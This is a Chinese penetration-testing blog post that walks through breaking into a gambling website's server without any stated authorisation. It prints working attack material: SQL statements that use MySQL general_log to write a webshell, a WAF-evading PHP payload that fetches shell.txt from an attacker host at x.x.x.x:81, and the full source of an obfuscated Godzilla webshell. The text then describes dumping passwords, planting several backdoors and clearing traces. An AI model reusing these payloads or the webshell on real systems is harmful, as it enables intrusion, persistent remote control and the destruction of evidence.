【渗透实战系列】|13-waf绕过拿下赌博网站

  • A+
所属分类:安全文章

涉及知识点

信息搜集弱口令phpmyadmin拿shell绕过waf,哥斯拉的免杀shell抓密码远程连接cobalt strike留后门痕迹清理


确定目标

【渗透实战系列】|13-waf绕过拿下赌博网站

收集信息

x.x.x.x

首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。
随手加个路径,报错了,当看到这个界面我瞬间就有思路了

【渗透实战系列】|13-waf绕过拿下赌博网站

为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的

upupw --> pmd 
phpstudy --> phpmyadmin

突破点

这个集成环境包也有个phpinfo的页面,跟数据库管理界面

u.php

【渗透实战系列】|13-waf绕过拿下赌博网站

测试一下弱口令

root/root

【渗透实战系列】|13-waf绕过拿下赌博网站

连接成功后就可以看到phpinfo的页面

【渗透实战系列】|13-waf绕过拿下赌博网站

好了现在问题变成phpmyadmin拿shell

【渗透实战系列】|13-waf绕过拿下赌博网站

getshell

三步拿shell

set global general_log='on';
SET global general_log_file='D:/xxxx/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf
换了个免杀马试试,先写到txt里边看看成否成功

【渗透实战系列】|13-waf绕过拿下赌博网站

没有任何问题,下面直接写入php文件

【渗透实战系列】|13-waf绕过拿下赌博网站

可以写入,直接去连接shell

【渗透实战系列】|13-waf绕过拿下赌博网站

果然有waf,当时写入的时候就感觉到了,不免杀的shell,sql语句执行不了

绕过waf

怼了半天都不知道是什么鬼waf,用下载文件试试
为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php

SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';
SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'

【渗透实战系列】|13-waf绕过拿下赌博网站

访问11.php 就会生成shell.php
这里的shell也是用了哥斯拉的免杀shell

<?php
session_start();
@set_time_limit(0);
@error_reporting(0);
function E($D,$K){
for($i=0;$i<strlen($D);$i++) {
$D[$i] = $D[$i]^$K[$i+1&15];
}
return $D;
}
function Q($D){
return base64_encode($D);
}
function O($D){
return base64_decode($D);
}
$P='pass';
$V='payload';
$T='3c6e0b8a9c15224a';
if (isset($_POST[$P])){
$F=O(E(O($_POST[$P]),$T));
if (isset($_SESSION[$V])){
$L=$_SESSION[$V];
$A=explode('|',$L);
class C{public function nvoke($p) {eval($p."");}}
$R=new C();
$R->nvoke($A[0]);
echo substr(md5($P.$T),0,16);
echo Q(E(@run($F),$T));
echo substr(md5($P.$T),16);
}else{
$_SESSION[$V]=$F;
}
}

【渗透实战系列】|13-waf绕过拿下赌博网站

尝试了这么多次

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|13-waf绕过拿下赌博网站

进程里没有waf进程

权限是system

【渗透实战系列】|13-waf绕过拿下赌博网站

脱源码

上传抓密码工具,直接获取管理密码,登上服务器

【渗透实战系列】|13-waf绕过拿下赌博网站


【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|13-waf绕过拿下赌博网站

留后门,清理痕迹

多留几个后门,万一被删

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|13-waf绕过拿下赌博网站

这个网段还有这么多机器

【渗透实战系列】|13-waf绕过拿下赌博网站

源码

打开源码才发现waf是360webscan


【渗透实战系列】|13-waf绕过拿下赌博网站



作者:newlifes,文章来源:先知社区

推荐阅读:



渗透实战系列


【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

【渗透实战系列】|13-waf绕过拿下赌博网站

长按-识别-关注

【渗透实战系列】|13-waf绕过拿下赌博网站

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】|13-waf绕过拿下赌博网站

点分享

【渗透实战系列】|13-waf绕过拿下赌博网站

点收藏

【渗透实战系列】|13-waf绕过拿下赌博网站

点点赞

【渗透实战系列】|13-waf绕过拿下赌博网站

点在看


本文始发于微信公众号(Hacking黑白红):【渗透实战系列】|13-waf绕过拿下赌博网站

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: